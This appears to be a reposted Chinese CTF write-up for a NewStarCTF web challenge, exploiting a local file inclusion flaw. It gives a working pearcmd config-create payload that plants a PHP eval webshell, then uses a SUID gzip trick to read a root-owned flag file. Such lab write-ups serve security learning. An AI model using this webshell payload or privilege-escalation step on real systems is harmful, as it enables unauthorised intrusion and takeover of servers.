首页 > 其他分享 >NewStarCTF WEEK5|WEB 4-复盘

NewStarCTF WEEK5|WEB 4-复盘

时间:2024-08-02 21:40:13浏览次数:6  
标签:WEB NewStarCTF .. 提权 php WEEK5 page

打开题目
image

研究一圈没啥营养价值

下载源码

image

发现好东西

        if (file_exists($page)) {
          require_once $page; 
        }else{
          require_once 'pages/error_page.php';
        }

活的文件包含
我们直接利用

?+config-create+/&page=../../../../../usr/local/lib/php/pearcmd&/<?=@eval($_POST[a]);?>+shell.php

这个方法来源

image

我这里蚁剑没连上
不知道是什么原因
连上后flag权限不够
可以提权SUID提权
image
还有个漏洞可以用gzip

gzip -f /flag -t

标签:WEB,NewStarCTF,..,提权,php,WEEK5,page
From: https://www.cnblogs.com/dghh/p/18339603

相关文章

  • driver. findElement()vs Selenium中的Webelement. findElement()
    Selenium是一个开源工具,可以自动化Web浏览器并帮助测试Web应用程序。它是Web应用程序测试中使用最广泛的工具之一。在Selenium中,两种常用的查找Web元素的方法是driver.findElement和WebElement.findElement。本文将讨论它们之间的差异。findElement()方法声明WebElementfindE......
  • 《从零开始:使用Python构建简单Web爬虫》
    前言随着互联网信息的爆炸性增长,如何高效地获取和处理这些数据变得越来越重要。Web爬虫作为一种自动化工具,可以帮助我们快速抓取所需的网页内容。本文将介绍如何使用Python编写一个简单的Web爬虫,并通过实例演示其基本用法。准备工作Python环境:确保你的计算机上已经安装......
  • NewStarCTF WEEK5|WEB pppython?
    对源码进行简单的分析<?php//检查`hint`请求参数是否等于指定的数组值if($_REQUEST['hint']==["your?","mine!","hint!!"]){//如果条件满足,设置响应内容类型为纯文本header("Content-type:text/plain");//执行系统命令`ls/-la`列出......
  • fastapi 使用websocket协议
      fastapi是一个高性能异步web框架,并且支持websocket协议。这是一个比较新的框架,但github上的Star数挺多,快追上flask了。1、websocket服务端的简单实现:@app.websocket('/test')asyncdefwebsocket_test(websocket:WebSocket):#服务器接受客户端的WebSocket连接请求。......
  • webservice 類型映射
    a1@1deMacBook-Prophone1%wsdl2h-ophoneService.hphoneService.wsdl-tapi.batSavingphoneService.h**ThegSOAPWSDL/WADL/XSDprocessorforCandC++,wsdl2hrelease2.8.135**Copyright(C)2000,2024GeniviaInc.AllRightsReserved.**Thewsdl......
  • .Net 6.0 Web API 项目生成镜像并上传到私有仓库 Harbor
    〇、前言本文首先简单介绍了Dockerfile内容和常用命令;然后是在Windows环境Dockerdesktop的安装和配置;最后创建了WebAPI示例项目,并简单说明了从构建到推送至Harbor镜像仓库的步骤。一、关于Dockerfile1.1Dockerfile文件示例#Seehttps://aka.ms/customizecont......
  • NewStarCTF WEEK5|WEB Ye's Pickle
    下载附件#-*-coding:utf-8-*-importbase64importstringimportrandomfromflaskimport*importjwcrypto.jwkasjwkimportpicklefrompython_jwtimport*app=Flask(__name__)#创建Flask应用实例defgenerate_random_string(length=16):""&q......
  • Burp Suite Professional 2024.7 发布 - Web 应用安全、测试和扫描
    BurpSuiteProfessional2024.7(macOS,Linux,Windows)-Web应用安全、测试和扫描BurpSuiteProfessional,Test,find,andexploitvulnerabilities.请访问原文链接:https://sysin.org/blog/burp-suite-pro/,查看最新版。原创作品,转载请保留出处。BurpSuiteProfessiona......
  • WEEK5|WEB Unserialize Again
    进入后是一个文件上传但是这里并没有漏洞点看cookie得到源码<?phphighlight_file(__FILE__);error_reporting(0);classstory{private$user='admin';public$pass;public$eating;public$God='false';publicfunction__wakeup(){......
  • 基于Java的数据结构课程网站的设计与实现/线上学习系统/在线教学管理系统/Web、SSM、v
    需要源码的联系方式请查看文章末尾数据结构课程网站的设计与实现摘 要计算机网络与信息化管理相配合,可以有效地提高管理人员的工作效能和改进工作的质量。良好的数据结构课程网站可以使管理员工作得到更好的实施和应用,并有助于管理员更好地管理数据结构课程,解决人力管理......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99